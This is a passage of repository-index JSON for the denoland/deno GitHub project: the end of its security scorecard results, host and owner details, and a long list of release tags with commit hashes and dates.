pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025